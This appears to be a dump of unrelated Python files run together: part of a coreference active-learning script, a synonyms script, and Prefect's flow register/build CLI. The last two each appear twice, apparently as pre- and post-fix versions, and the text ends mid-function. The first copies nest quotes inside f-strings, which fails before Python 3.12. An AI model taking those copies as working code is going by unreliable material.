{model_file}') model_file.unlink() def userstudy(config, data_train): """ Update the model based on feedback from user study. - [config]: hyperparameters for model fine-tuning - [data_train]: data pool to sample from """ def preprocess_data(doc, queries): """ Create a new field in [doc] called [antecedent_map] which processes the user-labeled [antecedents]. Add all labeled spans to [queries]. in queries). """ ante_map = {} for entry in doc['antecedents']: span = tuple(entry[0]) if entry[1] == -1: label = None elif entry[1] == 0: label = '0' else: label = [tuple(entry[1])] ante_map[span] = label doc['antecedent_map'] = ante_map del doc['antecedents'] # update queries to know what has been queried queries[doc['doc_key']] = list(ante_map.keys()) # return # spans labeled return len(ante_map) # preprocess antecedents and get queries data_fp = config['userstudy'] / 'train_data.jsonl' data = [] queries = defaultdict(list) num_queries = 0 with open(data_fp, 'r') as f: for line in f: doc = json.loads(line) # update doc and queries n = preprocess_data(doc, queries) num_queries += n data.append(doc) # finetune model on data src_path = config['src_path'] logging.info( f'Finetuning src model on {num_queries} queries from {len(data)} docs' ) scores_dev, model = finetune_on_queries(config, data, config['userstudy'], src_path) # test model results_fp = config['userstudy'] / 'results_test.json' scores_test = eval_scores(model, config, "test") output_results(results_fp, config, 1, scores_test) def write_config(c): config = copy.copy(c) config_path = config["sim_dir"] / "config.json" logging.info(f"Saved at {config_path}") config["device"] = str(config["device"]) config["sim_dir"] = str(config["sim_dir"]) config["src_path"] = str(config["src_path"]) with open(config_path, 'w+') as f: f.write(json.dumps(config, indent=4)) def change_log(logfile): log = logging.getLogger() for hdlr in log.handlers[:]: # remove the existing file handlers if isinstance(hdlr,logging.FileHandler): log.removeHandler(hdlr) filehandler = logging.FileHandler(logfile,'a') formatter = logging.Formatter("%(asctime)s [%(levelname)s] %(message)s") filehandler.setFormatter(formatter) log.addHandler(filehandler) if __name__ == "__main__": config = util.initialize_from_env(use_overrides=True) config['src_path'] = pathlib.Path('checkpoint.bin') config['sim_dir'] = pathlib.Path(config['simulation_dir']) / config['run_name'] util.set_seed(config) train_pool = util.load_data(config[f'train_path'], num_examples=config['num_train_examples']) if 'user' in config: config['userstudy'] = \ pathlib.Path(f'/exp/myuan/userstudy/day1/session{config["session"]}') / config["user"] userstudy(config, train_pool) else: simulation(config, train_pool) write_config(config)
from _collections import defaultdict words_with_synonyms = defaultdict(list) n = int(input()) for _ in range(n): word = input() synonym = input() words_with_synonyms[word].append(synonym) for word, synonyms in words_with_synonyms.items(): print(f'{word} - {', '.join(synonyms)}')
from _collections import defaultdict words_with_synonyms = defaultdict(list) n = int(input()) for _ in range(n): word = input() synonym = input() words_with_synonyms[word].append(synonym) for word, synonyms in words_with_synonyms.items(): print(f'{word} - {", ".join(synonyms)}')
import functools import hashlib import importlib import json import multiprocessing import os import runpy import sys import time import traceback import glob from collections import Counter, defaultdict from types import ModuleType from typing import Union, NamedTuple, List, Dict, Iterator, Tuple import marshmallow import click import box from click.exceptions import ClickException import prefect from prefect.utilities.filesystems import read_bytes_from_path, parse_path from prefect.utilities.graphql import with_args, EnumValue, compress from prefect.utilities.importtools import import_object from prefect.storage import Local, Module from prefect.run_configs import UniversalRun FlowLike = Union[box.Box, "prefect.Flow"] class SimpleFlowSchema(marshmallow.Schema): """A simple flow schema, only checks the `name` field""" class Meta: unknown = marshmallow.INCLUDE name = marshmallow.fields.Str() @marshmallow.post_load def post_load_hook(self, data, **kwargs): return box.Box(**data) class FlowsJSONSchema(marshmallow.Schema): """Schema for a `flows.json` file""" version = marshmallow.fields.Integer() flows = marshmallow.fields.List(marshmallow.fields.Nested(SimpleFlowSchema)) class TerminalError(Exception): """An error indicating the CLI should exit with a non-zero exit code""" pass def handle_terminal_error(func): """Wrap a command to handle a `TerminalError`""" @functools.wraps(func) def inner(*args, **kwargs): try: return func(*args, **kwargs) except TerminalError as exc: msg = str(exc) if msg: click.secho(msg, fg="red") sys.exit(1) return inner def log_exception(exc: Exception, indent: int = 0) -> None: """Log an exception with traceback""" prefix = " " * indent lines = traceback.format_exception( type(exc), exc, getattr(exc, "__traceback__", None) ) click.echo("".join(prefix + l for l in lines)) def get_module_paths(modules: List[str]) -> List[str]: """Given a list of modules, return their file paths.""" out = [] for name in modules: try: spec = importlib.util.find_spec(name) except Exception as exc: click.secho(f"Error loading module {name}:", fg="red") log_exception(exc, indent=2) raise TerminalError if spec is None: raise TerminalError(f"No module named {name!r}") else: out.append(spec.origin) return out def expand_paths(paths: List[str]) -> List[str]: """Given a list of paths, expand any directories to find all contained python files.""" out = [] globbed_paths = set() for path in tuple(paths): found_paths = glob.glob(path, recursive=True) if not found_paths: raise TerminalError(f"Path {path!r} doesn't exist") globbed_paths.update(found_paths) for path in globbed_paths: if os.path.isdir(path): with os.scandir(path) as directory: out.extend( e.path for e in directory if e.is_file() and e.path.endswith(".py") ) else: out.append(path) return out def load_flows_from_script(path: str) -> "List[prefect.Flow]": """Given a file path, load all flows found in the file""" # We use abs_path for everything but logging (logging the original # user-specified path provides a clearer message). abs_path = os.path.abspath(path) # Temporarily add the flow's local directory to `sys.path` so that local # imports work. This ensures that `sys.path` is the same as it would be if # the flow script was run directly (i.e. `python path/to/flow.py`). orig_sys_path = sys.path.copy() sys.path.insert(0, os.path.dirname(abs_path)) try: with prefect.context({"loading_flow": True, "local_script_path": abs_path}): namespace = runpy.run_path(abs_path, run_name="<flow>") except Exception as exc: click.secho(f"Error loading {path!r}:", fg="red") log_exception(exc, 2) raise TerminalError finally: sys.path[:] = orig_sys_path flows = [f for f in namespace.values() if isinstance(f, prefect.Flow)] if flows: for f in flows: if f.storage is None: f.storage = Local(path=abs_path, stored_as_script=True) return flows def load_flows_from_module(name: str) -> "List[prefect.Flow]": """ Given a module name (or full import path to a flow), load all flows found in the module """ try: with prefect.context({"loading_flow": True}): mod_or_obj = import_object(name) except Exception as exc: # If the requested module (or any parent module) isn't found, log # without a traceback, otherwise log a general message with the # traceback. if isinstance(exc, ModuleNotFoundError) and ( name == exc.name or (name.startswith(exc.name) and name[len(exc.name)] == ".") ): raise TerminalError(str(exc)) elif isinstance(exc, AttributeError): raise TerminalError(str(exc)) else: click.secho(f"Error loading {name!r}:", fg="red") log_exception(exc, 2) raise TerminalError if isinstance(mod_or_obj, ModuleType): flows = [f for f in vars(mod_or_obj).values() if isinstance(f, prefect.Flow)] elif isinstance(mod_or_obj, prefect.Flow): flows = [mod_or_obj] # Get a valid module name for f.storage name, _ = name.rsplit(".", 1) else: click.secho( f"Invalid object of type {type(mod_or_obj).__name__!r} found at {name!r}. " f"Expected Module or Flow." ) raise TerminalError if flows: for f in flows: if f.storage is None: f.storage = Module(name) return flows def load_flows_from_json(path: str) -> "List[dict]": """Given a path to a JSON file containing flows, load all flows. Note that since `FlowSchema` doesn't roundtrip without mutation, we keep the flow objects as dicts. """ try: contents = read_bytes_from_path(path) except FileNotFoundError: raise TerminalError(f"Path {path!r} doesn't exist") except Exception as exc: click.secho(f"Error loading {path!r}:", fg="red") log_exception(exc, indent=2) raise TerminalError from exc try: flows_json = FlowsJSONSchema().load(json.loads(contents)) except Exception: raise TerminalError(f"{path!r} is not a valid Prefect flows `json` file.") if flows_json["version"] != 1: raise TerminalError( f"{path!r} is version {flows_json["version"]}, only version 1 is supported" ) return flows_json["flows"] class Source(NamedTuple): location: str kind: str def collect_flows( paths: List[str], modules: List[str], json_paths: List[str], names: List[str] = None, in_watch: bool = False, ) -> "Dict[Source, List[FlowLike]]": """Load all flows found in `paths` & `modules`. Args: - paths (List[str]): file paths to load flows from. - modules (List[str]): modules to load flows from. - json_paths (List[str]): file paths to JSON files to load flows from. - names (List[str], optional): a list of flow names to collect. If not provided, all flows found will be returned. - in_watch (bool): If true, any errors in loading the flows will be logged but won't abort execution. Default is False. """ sources = [Source(p, "script") for p in paths] sources.extend(Source(m, "module") for m in modules) sources.extend(Source(m, "json") for m in json_paths) out = {} for s in sources: try: if s.kind == "module": flows = load_flows_from_module(s.location) elif s.kind == "json": flows = load_flows_from_json(s.location) else: flows = load_flows_from_script(s.location) except TerminalError: # If we're running with --watch, bad files are logged and skipped # rather than aborting early if not in_watch: raise out[s] = flows # Filter flows by name if requested if names: names = set(names) out = { source: [f for f in flows if f.name in names] for source, flows in out.items() } missing = names.difference(f.name for flows in out.values() for f in flows) if missing: missing_flows = "\n".join(f"- {n}" for n in sorted(missing)) click.secho( f"Failed to find the following flows:\n{missing_flows}", fg="red" ) if not in_watch: raise TerminalError # Drop empty sources out = {source: flows for source, flows in out.items() if flows} return out def prepare_flows(flows: "List[FlowLike]", labels: List[str] = None) -> None: """Finish preparing flows. Shared code between `register` and `build` for any flow modifications required before building the flow's storage. Modifies the flows in-place. """ labels = set(labels or ()) # Finish setting up all flows before building, to ensure a stable hash # for flows sharing storage instances for flow in flows: if isinstance(flow, dict): # Add any extra labels to the flow new_labels = set(flow["run_config"].get("labels") or []).union(labels) flow["run_config"]["labels"] = sorted(new_labels) else: # Set the default flow result if not specified if not flow.result: flow.result = flow.storage.result # Add a `run_config` if not configured explicitly if flow.run_config is None: flow.run_config = UniversalRun() # Add any extra labels to the flow (either specified via the CLI, # or from the storage object). flow.run_config.labels.update(labels) flow.run_config.labels.update(flow.storage.labels) # Add the flow to storage flow.storage.add_flow(flow) def get_project_id(client: "prefect.Client", project: str) -> str: """Get a project id given a project name. Args: - project (str): the project name Returns: - str: the project id """ resp = client.graphql( {"query": {with_args("project", {"where": {"name": {"_eq": project}}}): {"id"}}} ) if resp.data.project: return resp.data.project[0].id else: raise TerminalError(f"Project {project!r} does not exist") def register_serialized_flow( client: "prefect.Client", serialized_flow: dict, project_id: str, force: bool = False, schedule: bool = True, ) -> Tuple[str, int, bool]: """Register a pre-serialized flow. Args: - client (prefect.Client): the prefect client - serialized_flow (dict): the serialized flow - project_id (str): the project id - force (bool, optional): If `False` (default), an idempotency key will be generated to avoid unnecessary re-registration. Set to `True` to force re-registration. - schedule (bool, optional): If `True` (default) activates the flow schedule upon registering. Returns: - flow_id (str): the flow id - flow_version (int): the flow version - is_new (bool): True if this is a new flow version, false if re-registration was skipped. """ # Get most recent flow id for this flow. This can be removed once # the registration graphql routes return more information flow_name = serialized_flow["name"] resp = client.graphql( { "query": { with_args( "flow", { "where": { "_and": { "name": {"_eq": flow_name}, "project": {"id": {"_eq": project_id}}, } }, "order_by": {"version": EnumValue("desc")}, "limit": 1, }, ): {"id", "version"} } } ) if resp.data.flow: prev_id = resp.data.flow[0].id prev_version = resp.data.flow[0].version else: prev_id = None prev_version = 0 inputs = dict( project_id=project_id, serialized_flow=compress(serialized_flow), set_schedule_active=schedule, ) if not force: inputs["idempotency_key"] = hashlib.sha256( json.dumps(serialized_flow, sort_keys=True).encode() ).hexdigest() res = client.graphql( { "mutation($input: create_flow_from_compressed_string_input!)": { "create_flow_from_compressed_string(input: $input)": {"id"} } }, variables=dict(input=inputs), retry_on_api_error=False, ) new_id = res.data.create_flow_from_compressed_string.id if new_id == prev_id: return new_id, prev_version, False else: return new_id, prev_version + 1, True def build_and_register( client: "prefect.Client", flows: "List[FlowLike]", project_id: str, labels: List[str] = None, force: bool = False, schedule: bool = True, ) -> Counter: """Build and register all flows. Args: - client (prefect.Client): the prefect client to use - flows (List[FlowLike]): the flows to register - project_id (str): the project id in which to register the flows - labels (List[str], optional): Any extra labels to set on all flows - force (bool, optional): If false (default), an idempotency key will be used to avoid unnecessary register calls. - schedule (bool, optional): If `True` (default) activates the flow schedule upon registering. Returns: - Counter: stats about the number of successful, failed, and skipped flows. """ # Finish preparing flows to ensure a stable hash later prepare_flows(flows, labels) # Group flows by storage instance. storage_to_flows = defaultdict(list) for flow in flows: storage = flow.storage if isinstance(flow, prefect.Flow) else None storage_to_flows[storage].append(flow) # Register each flow, building storage as needed. # Stats on success/fail/skip rates are kept for later display stats = Counter(registered=0, errored=0, skipped=0) for storage, flows in storage_to_flows.items(): # Build storage if needed if storage is not None: click.echo(f" Building `{type(storage).__name__}` storage...") try: storage.build() except Exception as exc: click.secho(" Error building storage:", fg="red") log_exception(exc, indent=6) red_error = click.style("Error", fg="red") for flow in flows: click.echo(f" Registering {flow.name!r}... {red_error}") stats["errored"] += 1 continue for flow in flows: click.echo(f" Registering {flow.name!r}...", nl=False) try: if isinstance(flow, box.Box): serialized_flow = flow else: serialized_flow = flow.serialize(build=False) flow_id, flow_version, is_new = register_serialized_flow( client=client, serialized_flow=serialized_flow, project_id=project_id, force=force, schedule=schedule, ) except Exception as exc: click.secho(" Error", fg="red") log_exception(exc, indent=4) stats["errored"] += 1 else: if is_new: click.secho(" Done", fg="green") click.echo(f" └── ID: {flow_id}") click.echo(f" └── Version: {flow_version}") stats["registered"] += 1 else: click.secho(" Skipped (metadata unchanged)", fg="yellow") stats["skipped"] += 1 return stats def register_internal( project: str, paths: List[str], modules: List[str], json_paths: List[str] = None, names: List[str] = None, labels: List[str] = None, force: bool = False, schedule: bool = True, in_watch: bool = False, ) -> None: """Do a single registration pass, loading, building, and registering the requested flows. Args: - project (str): the project in which to register the flows. - paths (List[str]): a list of file paths containing flows. - modules (List[str]): a list of python modules containing flows. - json_paths (List[str]): a list of file paths containing serialied flows produced by `prefect build`. - names (List[str], optional): a list of flow names that should be registered. If not provided, all flows found will be registered. - labels (List[str], optional): a list of extra labels to set on all flows. - force (bool, optional): If false (default), an idempotency key will be used to avoid unnecessary register calls. - schedule (bool, optional): If `True` (default) activates the flow schedule upon registering. - in_watch (bool, optional): Whether this call resulted from a `register --watch` call. """ client = prefect.Client() # Determine the project id project_id = get_project_id(client, project) # Load flows from all files/modules requested click.echo("Collecting flows...") source_to_flows = collect_flows( paths, modules, json_paths, names=names, in_watch=in_watch ) # Iterate through each file, building all storage and registering all flows # Log errors as they happen, but only exit once all files have been processed stats = Counter(registered=0, errored=0, skipped=0) for source, flows in source_to_flows.items(): click.echo(f"Processing {source.location!r}:") stats += build_and_register( client, flows, project_id, labels=labels, force=force, schedule=schedule ) # Output summary message registered = stats["registered"] skipped = stats["skipped"] errored = stats["errored"] parts = [click.style(f"{registered} registered", fg="green")] if skipped: parts.append(click.style(f"{skipped} skipped", fg="yellow")) if errored: parts.append(click.style(f"{errored} errored", fg="red")) msg = ", ".join(parts) bar_length = max(60 - len(click.unstyle(msg)), 4) // 2 bar = "=" * bar_length click.echo(f"{bar} {msg} {bar}") # If not in a watch call, exit with appropriate exit code if not in_watch and stats["errored"]: raise TerminalError def watch_for_changes( paths: List[str] = None, modules: List[str] = None, period: float = 0.5, ) -> "Iterator[Tuple[List[str], List[str]]]": """Watch a list of paths and modules for changes. Yields tuples of `(paths, modules)` whenever changes are detected, where `paths` is a list of paths that changed and `modules` is a list of modules that changed. """ paths = list(paths or ()) modules = list(modules or ()) for path in paths: if not os.path.exists(path): raise TerminalError(f"Path {path!r} doesn't exist") if modules: # If modules are provided, we need to convert these to paths to watch. # There's no way in Python to do this without possibly importing the # defining module. As such, we run the command in a temporary process # pool. with multiprocessing.get_context("spawn").Pool(1) as pool: module_paths = pool.apply(get_module_paths, (modules,)) path_to_module = dict(zip(module_paths, modules)) else: path_to_module = {} tracked = paths + list(path_to_module) cache = dict.fromkeys(path_to_module) while True: cache2 = {} for path in tracked: try: try: with os.scandir(path) as directory: for entry in directory: if entry.is_file() and entry.path.endswith(".py"): old_mtime = cache.get(entry.path) mtime = entry.stat().st_mtime if mtime != old_mtime: cache2[entry.path] = mtime except NotADirectoryError: old_mtime = cache.get(path) mtime = os.stat(path).st_mtime if mtime != old_mtime: cache2[path] = mtime except FileNotFoundError: cache.pop(path, None) if cache2: change_paths = [] change_mods = [] for path in cache2: module = path_to_module.get(path) if module is not None: change_mods.append(module) else: change_paths.append(path) if change_paths or change_mods: yield change_paths, change_mods cache.update(cache2) time.sleep(period) REGISTER_EPILOG = """ \bExamples: \b Register all flows found in a directory. \b $ prefect register --project my-project -p myflows/ \b Register a flow named "example" found in `flow.py`. \b $ prefect register --project my-project -p flow.py -n "example" \b Register all flows found in a module named `myproject.flows`. \b $ prefect register --project my-project -m "myproject.flows" \b Register a flow in variable `flow_x` in a module `myproject.flows`. \b $ prefect register --project my-project -m "myproject.flows.flow_x" \b Register all pre-built flows from a remote JSON file. \b $ prefect register --project my-project --json https://some-url/flows.json \b Register all flows in python files found recursively using globbing \b $ prefect register --project my-project --path "**/*" \b Watch a directory of flows for changes, and re-register flows upon change. \b $ prefect register --project my-project -p myflows/ --watch \b Register a flow found in `flow.py` and disable its schedule. \b $ prefect register --project my-project -p flow.py --no-schedule """ @click.group(invoke_without_command=True, epilog=REGISTER_EPILOG) @click.option( "--project", help="The name of the Prefect project to register this flow in. Required.", default=None, ) @click.option( "--path", "-p", "paths", help=( "A path to a file or a directory containing the flow(s) to register. " "May be passed multiple times to specify multiple paths." ), multiple=True, ) @click.option( "--module", "-m", "modules", help=( "A python module name containing the flow(s) to register. May be the full " "import path to a flow. May be passed multiple times to specify multiple " "modules. " ), multiple=True, ) @click.option( "--json", "-j", "json_paths", help=( "A path or URL to a JSON file created by `prefect build` containing the flow(s) " "to register. May be passed multiple times to specify multiple paths. " "Note that this path may be a remote url (e.g. https://some-url/flows.json)." ), multiple=True, ) @click.option( "--name", "-n", "names", help=( "The name of a flow to register from the specified paths/modules. If " "provided, only flows with a matching name will be registered. May be " "passed multiple times to specify multiple flows. If not provided, all " "flows found on all paths/modules will be registered." ), multiple=True, ) @click.option( "--label", "-l", "labels", help=( "A label to add on all registered flow(s). May be passed multiple " "times to specify multiple labels." ), multiple=True, ) @click.option( "--force", "-f", help="Force flow registration, even if the flow's metadata is unchanged.", default=False, is_flag=True, ) @click.option( "--watch", help=( "If set, the specified paths and modules will be monitored and " "registration re-run upon changes." ), default=False, is_flag=True, ) @click.option( "--schedule/--no-schedule", help=( "Toggles the flow schedule upon registering. By default, the " "flow's schedule will be activated and future runs will be created. " "If disabled, the schedule will still be attached to the flow but " "no runs will be created until it is activated." ), default=True, ) @handle_terminal_error def register( project, paths, modules, json_paths, names, labels, force, watch, schedule ): """Register one or more flows into a project. Flows with unchanged metadata will be skipped as registering again will only change the version number. """ if project is None: raise ClickException("Missing required option '--project'") paths = expand_paths(paths) if watch: if any(parse_path(j).scheme != "file" for j in json_paths): raise ClickException("--watch is not supported for remote paths") json_paths = set(json_paths) ctx = multiprocessing.get_context("spawn") for change_paths_temp, change_mods in watch_for_changes( paths=paths, modules=modules ): change_paths = [] change_json_paths = [] for p in change_paths_temp: if p in json_paths: change_json_paths.append(p) else: change_paths.append(p) proc = ctx.Process( target=register_internal, name="prefect-register", args=(project,), kwargs=dict( paths=change_paths, modules=change_mods, json_paths=change_json_paths, names=names, labels=labels, force=force, in_watch=True, schedule=schedule, ), daemon=True, ) proc.start() proc.join() else: modules = list(modules or ()) register_internal( project, paths, modules, json_paths, names, labels, force, schedule ) BUILD_EPILOG = """ \bExamples: \b Build all flows found in a directory. \b $ prefect build -p myflows/ \b Build a flow named "example" found in `flow.py`. \b $ prefect build -p flow.py -n "example" \b Build all flows found in a module named `myproject.flows`. \b $ prefect build -m "myproject.flows" \b Build all flows in python files named `flow.py` found recursively using globbing \b $ prefect register --project my-project -p "**/flow.py" """ @click.command(epilog=BUILD_EPILOG) @click.option( "--path", "-p", "paths", help=( "A path to a file or a directory containing the flow(s) to build. " "May be passed multiple times to specify multiple paths." ), multiple=True, ) @click.option( "--module", "-m", "modules", help=( "A python module name containing the flow(s) to build. May be " "passed multiple times to specify multiple modules." ), multiple=True, ) @click.option( "--name", "-n", "names", help=( "The name of a flow to build from the specified paths/modules. If " "provided, only flows with a matching name will be built. May be " "passed multiple times to specify multiple flows. If not provided, " "all flows found on all paths/modules will be built." ), multiple=True, ) @click.option( "--label", "-l", "labels", help=( "A label to add on all built flow(s). May be passed multiple " "times to specify multiple labels." ), multiple=True, ) @click.option( "--output", "-o", default="flows.json", help="The output path. Defaults to `flows.json`.", ) @click.option( "--update", "-u", is_flag=True, default=False, help="Updates an existing `json` file rather than overwriting it.", ) @handle_terminal_error def build(paths, modules, names, labels, output, update): """Build one or more flows. This command builds all specified flows and writes their metadata to a JSON file. These flows can then be registered without building later by passing the `--json` flag to `prefect register`. """ succeeded = 0 errored = 0 # If updating, load all previously written flows first if update and os.path.exists(output): serialized_flows = {f["name"]: f for f in load_flows_from_json(output)} else: serialized_flows = {} # Collect flows from specified paths & modules paths = expand_paths(list(paths or ())) modules = list(modules or ()) click.echo("Collecting flows...") source_to_flows = collect_flows(paths, modules, [], names=names) for source, flows in source_to_flows.items(): click.echo(f"Processing {source.location!r}:") # Finish preparing flows to ensure a stable hash later prepare_flows(flows, labels) # Group flows by storage instance. storage_to_flows = defaultdict(list) for flow in flows: storage_to_flows[flow.storage].append(flow) for storage, flows in storage_to_flows.items(): # Build storage click.echo(f" Building `{type(storage).__name__}` storage...") try: storage.build() except Exception as exc: click.secho(" Error building storage:", fg="red") log_exception(exc, indent=6) red_error = click.style("Error", fg="red") for flow in flows: click.echo(f" Building {flow.name!r}... {red_error}") errored += 1 continue # Serialize flows for flow in flows: click.echo(f" Building {flow.name!r}...", nl=False) try: serialized_flows[flow.name] = flow.serialize(build=False) except Exception as exc: click.secho(" Error", fg="red") log_exception(exc, indent=4) errored += 1 else: click.secho(" Done", fg="green") succeeded += 1 # Write output file click.echo(f"Writing output to {output!r}") flows = [serialized_flows[name] for name in sorted(serialized_flows)] obj = {"version": 1, "flows": flows} with open(output, "w") as fil: json.dump(obj, fil, sort_keys=True) # Output summary message parts = [click.style(f"{succeeded} built", fg="green")] if errored: parts.append(click.style(f"{errored} errored", fg="red")) msg = ", ".join(parts) bar_length = max(60 - len(click.unstyle(msg)), 4) // 2 bar = "=" * bar_length click.echo(f"{bar} {msg} {bar}") # Exit with appropriate status code if errored: raise TerminalError
import functools import hashlib import importlib import json import multiprocessing import os import runpy import sys import time import traceback import glob from collections import Counter, defaultdict from types import ModuleType from typing import Union, NamedTuple, List, Dict, Iterator, Tuple import marshmallow import click import box from click.exceptions import ClickException import prefect from prefect.utilities.filesystems import read_bytes_from_path, parse_path from prefect.utilities.graphql import with_args, EnumValue, compress from prefect.utilities.importtools import import_object from prefect.storage import Local, Module from prefect.run_configs import UniversalRun FlowLike = Union[box.Box, "prefect.Flow"] class SimpleFlowSchema(marshmallow.Schema): """A simple flow schema, only checks the `name` field""" class Meta: unknown = marshmallow.INCLUDE name = marshmallow.fields.Str() @marshmallow.post_load def post_load_hook(self, data, **kwargs): return box.Box(**data) class FlowsJSONSchema(marshmallow.Schema): """Schema for a `flows.json` file""" version = marshmallow.fields.Integer() flows = marshmallow.fields.List(marshmallow.fields.Nested(SimpleFlowSchema)) class TerminalError(Exception): """An error indicating the CLI should exit with a non-zero exit code""" pass def handle_terminal_error(func): """Wrap a command to handle a `TerminalError`""" @functools.wraps(func) def inner(*args, **kwargs): try: return func(*args, **kwargs) except TerminalError as exc: msg = str(exc) if msg: click.secho(msg, fg="red") sys.exit(1) return inner def log_exception(exc: Exception, indent: int = 0) -> None: """Log an exception with traceback""" prefix = " " * indent lines = traceback.format_exception( type(exc), exc, getattr(exc, "__traceback__", None) ) click.echo("".join(prefix + l for l in lines)) def get_module_paths(modules: List[str]) -> List[str]: """Given a list of modules, return their file paths.""" out = [] for name in modules: try: spec = importlib.util.find_spec(name) except Exception as exc: click.secho(f"Error loading module {name}:", fg="red") log_exception(exc, indent=2) raise TerminalError if spec is None: raise TerminalError(f"No module named {name!r}") else: out.append(spec.origin) return out def expand_paths(paths: List[str]) -> List[str]: """Given a list of paths, expand any directories to find all contained python files.""" out = [] globbed_paths = set() for path in tuple(paths): found_paths = glob.glob(path, recursive=True) if not found_paths: raise TerminalError(f"Path {path!r} doesn't exist") globbed_paths.update(found_paths) for path in globbed_paths: if os.path.isdir(path): with os.scandir(path) as directory: out.extend( e.path for e in directory if e.is_file() and e.path.endswith(".py") ) else: out.append(path) return out def load_flows_from_script(path: str) -> "List[prefect.Flow]": """Given a file path, load all flows found in the file""" # We use abs_path for everything but logging (logging the original # user-specified path provides a clearer message). abs_path = os.path.abspath(path) # Temporarily add the flow's local directory to `sys.path` so that local # imports work. This ensures that `sys.path` is the same as it would be if # the flow script was run directly (i.e. `python path/to/flow.py`). orig_sys_path = sys.path.copy() sys.path.insert(0, os.path.dirname(abs_path)) try: with prefect.context({"loading_flow": True, "local_script_path": abs_path}): namespace = runpy.run_path(abs_path, run_name="<flow>") except Exception as exc: click.secho(f"Error loading {path!r}:", fg="red") log_exception(exc, 2) raise TerminalError finally: sys.path[:] = orig_sys_path flows = [f for f in namespace.values() if isinstance(f, prefect.Flow)] if flows: for f in flows: if f.storage is None: f.storage = Local(path=abs_path, stored_as_script=True) return flows def load_flows_from_module(name: str) -> "List[prefect.Flow]": """ Given a module name (or full import path to a flow), load all flows found in the module """ try: with prefect.context({"loading_flow": True}): mod_or_obj = import_object(name) except Exception as exc: # If the requested module (or any parent module) isn't found, log # without a traceback, otherwise log a general message with the # traceback. if isinstance(exc, ModuleNotFoundError) and ( name == exc.name or (name.startswith(exc.name) and name[len(exc.name)] == ".") ): raise TerminalError(str(exc)) elif isinstance(exc, AttributeError): raise TerminalError(str(exc)) else: click.secho(f"Error loading {name!r}:", fg="red") log_exception(exc, 2) raise TerminalError if isinstance(mod_or_obj, ModuleType): flows = [f for f in vars(mod_or_obj).values() if isinstance(f, prefect.Flow)] elif isinstance(mod_or_obj, prefect.Flow): flows = [mod_or_obj] # Get a valid module name for f.storage name, _ = name.rsplit(".", 1) else: click.secho( f"Invalid object of type {type(mod_or_obj).__name__!r} found at {name!r}. " f"Expected Module or Flow." ) raise TerminalError if flows: for f in flows: if f.storage is None: f.storage = Module(name) return flows def load_flows_from_json(path: str) -> "List[dict]": """Given a path to a JSON file containing flows, load all flows. Note that since `FlowSchema` doesn't roundtrip without mutation, we keep the flow objects as dicts. """ try: contents = read_bytes_from_path(path) except FileNotFoundError: raise TerminalError(f"Path {path!r} doesn't exist") except Exception as exc: click.secho(f"Error loading {path!r}:", fg="red") log_exception(exc, indent=2) raise TerminalError from exc try: flows_json = FlowsJSONSchema().load(json.loads(contents)) except Exception: raise TerminalError(f"{path!r} is not a valid Prefect flows `json` file.") if flows_json["version"] != 1: raise TerminalError( f"{path!r} is version {flows_json['version']}, only version 1 is supported" ) return flows_json["flows"] class Source(NamedTuple): location: str kind: str def collect_flows( paths: List[str], modules: List[str], json_paths: List[str], names: List[str] = None, in_watch: bool = False, ) -> "Dict[Source, List[FlowLike]]": """Load all flows found in `paths` & `modules`. Args: - paths (List[str]): file paths to load flows from. - modules (List[str]): modules to load flows from. - json_paths (List[str]): file paths to JSON files to load flows from. - names (List[str], optional): a list of flow names to collect. If not provided, all flows found will be returned. - in_watch (bool): If true, any errors in loading the flows will be logged but won't abort execution. Default is False. """ sources = [Source(p, "script") for p in paths] sources.extend(Source(m, "module") for m in modules) sources.extend(Source(m, "json") for m in json_paths) out = {} for s in sources: try: if s.kind == "module": flows = load_flows_from_module(s.location) elif s.kind == "json": flows = load_flows_from_json(s.location) else: flows = load_flows_from_script(s.location) except TerminalError: # If we're running with --watch, bad files are logged and skipped # rather than aborting early if not in_watch: raise out[s] = flows # Filter flows by name if requested if names: names = set(names) out = { source: [f for f in flows if f.name in names] for source, flows in out.items() } missing = names.difference(f.name for flows in out.values() for f in flows) if missing: missing_flows = "\n".join(f"- {n}" for n in sorted(missing)) click.secho( f"Failed to find the following flows:\n{missing_flows}", fg="red" ) if not in_watch: raise TerminalError # Drop empty sources out = {source: flows for source, flows in out.items() if flows} return out def prepare_flows(flows: "List[FlowLike]", labels: List[str] = None) -> None: """Finish preparing flows. Shared code between `register` and `build` for any flow modifications required before building the flow's storage. Modifies the flows in-place. """ labels = set(labels or ()) # Finish setting up all flows before building, to ensure a stable hash # for flows sharing storage instances for flow in flows: if isinstance(flow, dict): # Add any extra labels to the flow new_labels = set(flow["run_config"].get("labels") or []).union(labels) flow["run_config"]["labels"] = sorted(new_labels) else: # Set the default flow result if not specified if not flow.result: flow.result = flow.storage.result # Add a `run_config` if not configured explicitly if flow.run_config is None: flow.run_config = UniversalRun() # Add any extra labels to the flow (either specified via the CLI, # or from the storage object). flow.run_config.labels.update(labels) flow.run_config.labels.update(flow.storage.labels) # Add the flow to storage flow.storage.add_flow(flow) def get_project_id(client: "prefect.Client", project: str) -> str: """Get a project id given a project name. Args: - project (str): the project name Returns: - str: the project id """ resp = client.graphql( {"query": {with_args("project", {"where": {"name": {"_eq": project}}}): {"id"}}} ) if resp.data.project: return resp.data.project[0].id else: raise TerminalError(f"Project {project!r} does not exist") def register_serialized_flow( client: "prefect.Client", serialized_flow: dict, project_id: str, force: bool = False, schedule: bool = True, ) -> Tuple[str, int, bool]: """Register a pre-serialized flow. Args: - client (prefect.Client): the prefect client - serialized_flow (dict): the serialized flow - project_id (str): the project id - force (bool, optional): If `False` (default), an idempotency key will be generated to avoid unnecessary re-registration. Set to `True` to force re-registration. - schedule (bool, optional): If `True` (default) activates the flow schedule upon registering. Returns: - flow_id (str): the flow id - flow_version (int): the flow version - is_new (bool): True if this is a new flow version, false if re-registration was skipped. """ # Get most recent flow id for this flow. This can be removed once # the registration graphql routes return more information flow_name = serialized_flow["name"] resp = client.graphql( { "query": { with_args( "flow", { "where": { "_and": { "name": {"_eq": flow_name}, "project": {"id": {"_eq": project_id}}, } }, "order_by": {"version": EnumValue("desc")}, "limit": 1, }, ): {"id", "version"} } } ) if resp.data.flow: prev_id = resp.data.flow[0].id prev_version = resp.data.flow[0].version else: prev_id = None prev_version = 0 inputs = dict( project_id=project_id, serialized_flow=compress(serialized_flow), set_schedule_active=schedule, ) if not force: inputs["idempotency_key"] = hashlib.sha256( json.dumps(serialized_flow, sort_keys=True).encode() ).hexdigest() res = client.graphql( { "mutation($input: create_flow_from_compressed_string_input!)": { 